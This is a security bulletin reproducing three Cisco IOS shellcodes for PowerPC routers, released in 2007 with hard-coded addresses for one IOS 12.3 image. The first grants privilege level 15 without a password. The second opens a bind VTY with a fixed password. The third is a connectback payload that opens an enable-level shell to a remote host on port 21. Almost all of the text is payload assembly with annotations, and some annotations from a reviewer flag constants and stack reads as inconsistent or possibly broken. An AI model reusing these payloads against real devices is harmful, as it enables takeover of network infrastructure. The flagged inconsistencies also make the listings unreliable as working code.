Several Cisco IOS shellcodes have been released. These shellcodes allow an attacker to gain elevated privileges on a Cisco device if the attacker can cause the device to execute any of the shellcodes attached below.
Credit:
The information has been provided by Gyan Chawdhary.
Cisco IOS Tiny shellcode
# -----------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_tiny_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following two hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
# Image-specific absolute addresses (header: IOS 12.3(22), C2600-IK9S-M).
# Every store below goes to one of these fixed locations, so on any other
# image the writes land somewhere unrelated; the likely outcome there is a
# crash/reload rather than a privilege change, which is also the symptom a
# defender is most likely to observe.
.equ ret, 0x804a42e8            # final indirect-call target ("exit code" per header)
.equ login, 0x8359b1f4          # word zeroed by the "login patch"
.equ god, 0xff100000            # value stored into the word at `priv`
.equ priv, 0x8359be64           # word that receives `god` ("priv patch")
# -----------------------------------------------
main:
# login patch begin
# r9 = &login (lis/la builds the 32-bit absolute address), then *r9 = 0.
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
# priv patch begin
# r9 = &priv, r8 = god, then *r9 = god.
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
# exit code
# Indirect call through CTR to `ret`. This is bctrl (link form), not bctr:
# if `ret` returns, execution continues past the end of this code.
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
Cisco IOS Bind shellcode
# -----------------------------------------------
#
# Cisco IOS Bind shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_Bindshell_v.1.0.txt
# (c) 2007 IRM Plc
# By Varun Uppal
#
# -----------------------------------------------
#
# The code creates a new VTY, allocates a password then sets the privilege level to 15
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length
#
# The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
# Image-specific absolute addresses (header: IOS 12.3(22), C2600-IK9S-M).
# Each routine is reached with lis/la + mtctr + bctrl (indirect call); the
# names are the page's own labels, their real semantics are not shown here.
.equ makenewvty, 0x803d0d08     # called with r3 = 71
.equ malloc, 0x804785cc         # called with r3 = 0x1e5c
.equ setpwonline, 0x803b9e90    # called with r3 = allocation, r4 = 0, r5 = string
.equ linesstruct, 0x82f9e334    # pointer read at the end; +0xde4 receives `priv`
# -----------------------------------------------
# NOTE(review): 0xf1000000 here differs from the 0xff100000 that the other two
# listings on this page store for the same stated purpose; cannot tell from
# here which value is intended.
.equ priv, 0xf1000000 #value used to set the privilege level
main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha
la 9,makenewvty@l(9)
mtctr 9
bctrl #makenewvty()
# r3 = 0x1e5c (size). After the call r3 is assumed to hold the returned
# pointer (PowerPC ABI return register); it is the base for the stores below.
li 3,0x1e5c
lis 9,malloc@ha
la 9,malloc@l(9)
mtctr 9
bctrl #malloc() memory for structure
# Two fields of the allocation are initialised (70 at +0xa68, 72 at +0xa6c);
# the meaning of these offsets is not stated on this page.
li 4,70
stw 4,0xa68(3)
li 5,72
stw 5,0xa6c(3)
# r4 = 0. `bl setp` places the address of the byte after itself -- the
# string -- into LR, which `setp` then copies into r5.
li 4,0x00
bl setp #pointer to the password into LR
# 7 characters + NUL = 8 bytes, so the instruction at `setp` stays 4-byte aligned.
.string "1rmp455" #the password for the line
setp: mflr 5
lis 9,setpwonline@ha
la 9,setpwonline@l(9)
mtctr 9
bctrl #setpwonline()
# r9 = *(linesstruct); then store `priv` at r9 + 0xde4.
lis 8,linesstruct@ha
la 8,linesstruct@l(8)
lwz 9,0(8)
lis 7,priv@ha
la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15
# No return or exit follows: control falls through to whatever sits after this code.
# The header's 116-byte figure: 27 instructions (108 bytes) + the 8-byte string.
Cisco IOS Connectback shellcode
# -----------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_Connectback_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
# Image-specific absolute addresses (header: IOS 12.3(22), C2600-IK9S-M).
# All are reached by lis/la (or lis/addi) + mtctr + bctrl; the names are the
# page's own labels and their real semantics are not shown here.
.equ malloc, 0x804785CC         # called with r3 = 512
.equ allocate_tty, 0x803d155c   # called with r3 = 66, r4 = 0
.equ ret, 0x804a42e8            # last indirect-call target in this listing
.equ addr, 0x803c4ad8           # called after the epilogue with r3 = -2, r4 = str
.equ str, 0x81e270b4            # passed in r4 to `addr`; contents not shown here
.equ tcp_connect, 0x80567568    # see the 7-register argument set-up below
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4          # word zeroed by the "login patch"
.equ god, 0xff100000            # value stored into the word at `priv`
.equ priv, 0x8359be64           # word that receives `god` ("priv patch")
# -----------------------------------------------
# Register / frame roles in main:
#   r31     = frame pointer (copy of r1 after the stwu)
#   20(r31) = malloc() result, later overwritten by the tcp_connect result
#   12(r31) = loaded as a pointer below but never stored to in this block
#   24(r31) = local whose address is passed in r8 to tcp_connect
# Frame is 48 bytes; r31 saved at 44(r1); LR saved at 52(r1), i.e. the
# conventional LR word in the caller's frame.
main:
stwu 1,-48(1)
mflr 0
stw 31,44(1)
stw 0,52(1)
mr 31,1
# malloc(512); r3 assumed to carry the returned pointer (ABI return register).
li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9)
mtctr 9
bctrl
mr 0,3
stw 0,20(31)
# NOTE(review): the pointer was just saved at 20(r31), but the next two loads
# read 12(r31), which nothing in this block writes. Whether the code behaves as
# the header describes therefore depends on what that slot happens to hold.
lwz 9,12(31)
li 0,1
stb 0,0(9)
lwz 9,12(31)
# (0xac1e << 16) | 1018 = 0xac1e03fa = 172.30.3.250 (RFC 1918 private range),
# stored at byte offset 4 of the structure. The address is a constant of this
# sample; the durable indicator for a defender is the device itself opening an
# outbound TCP connection to port 21 (set up further down), not this value.
lis 0,0xac1e # connect back ip address
ori 0,0,1018 #
stw 0,4(9)
# allocate_tty(66, 0)
li 3,66
li 4,0
lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9)
mtctr 9
bctrl
# r0 = &24(r31). None of the patch instructions below write r0, so this value
# is what `mr 8,0` later hands to tcp_connect.
addi 0,31,24
# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################
# login patch begin
# r9 = &login, then *r9 = 0.
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end
#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
# r9 = &priv, r8 = god, then *r9 = god.
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end
###########################################################
# tcp_connect(0, 21, *12(r31), 0, 0, &24(r31), 0) -- only the register values
# are visible here; parameter names are not given on this page.
li 3,0
li 4,21 # Port 21 for connectback
lwz 5,12(31)
li 6,0
li 7,0
mr 8,0
li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11)
mtctr 11
bctrl
# Result saved at 20(r31), overwriting the malloc() pointer stored earlier.
mr 0,3
stw 0,20(31)
# tcp_execute_command(66, <tcp_connect result>, 0, 0, 0, 0, 0, 0)
li 3,66
lwz 4,20(31)
li 5,0
li 6,0
li 7,0
li 8,0
li 9,0
li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11)
mtctr 11
bctrl
# Epilogue: r11 = back chain (caller's r1); LR from 4(r11) (== 52 of this
# frame); r31 from -4(r11) (== 44 of this frame); then pop the frame.
lwz 11,0(1)
lwz 0,4(11)
mtlr 0
lwz 31,-4(11)
mr 1,11
###########################################
# Tail after the frame is gone: addr(-2, str). Neither routine is described on
# this page. addi with rA = 0 is the immediate form, so r3 = -2 whatever the
# preceding xor left in it.
lis 9, addr@ha
addi 0, 9, addr@l
mtctr 0
xor 3,3,3
addi 3,0, -2
lis 10, str@ha
addi 4, 10, str@l
bctrl
# Indirect call to `ret` via CTR. This is bctrl (link form), not bctr: a
# return from `ret` would continue past the end of this code.
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl